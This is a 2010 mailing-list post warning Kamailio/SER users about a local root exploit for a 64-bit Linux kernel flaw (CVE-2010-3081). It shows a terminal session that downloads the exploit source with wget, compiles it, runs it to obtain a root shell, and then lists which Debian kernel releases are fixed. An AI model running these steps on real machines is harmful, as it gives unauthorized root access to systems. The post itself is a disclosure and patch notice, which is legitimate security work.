[SR-Users] [OT] Local root exploit for the x86_64 Linux kernel ia32syscall emulation vulnerability

Iñaki Baz Castillo Wed, 13 Oct 2010 17:20:00 -0700

In any Linux Kernel 64 bits < 2.6.36-rc4:


--------------------------------------------
i...@myserver :/tmp$ whoami
ibc

i...@myserver:/tmp$ wget
http://packetstormsecurity.org/1009-exploits/robert_you_suck.c

i...@myserver:/tmp$ gcc -o putada robert_you_suck.c

i...@myserver:/tmp$ ./putada
resolved symbol commit_creds to 0xffffffff81092120
resolved symbol prepare_kernel_cred to 0xffffffff81091fa0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0

sh-3.2# whoami
root   <----------- OPSSSS !!!
--------------------------------------------


More info:

  http://packetstormsecurity.org/filedesc/robert_you_suck.c.html


Fixed in Debian (kernel patch backported):

 http://security-tracker.debian.org/tracker/CVE-2010-3081
 - lenny (security)  2.6.26-25lenny1  fixed
 - lenny-backports  2.6.32-23~bpo50+1  fixed
 - squeeze  2.6.32-23  fixed


-- 
Iñaki Baz Castillo
<i...@aliax.net>

_______________________________________________
SIP Express Router (SER) and Kamailio (OpenSER) - sr-users mailing list
sr-users@lists.sip-router.org
http://lists.sip-router.org/cgi-bin/mailman/listinfo/sr-users

[SR-Users] [OT] Local root exploit for the x86_64 Linux kernel ia32syscall emulation vulnerability

Reply via email to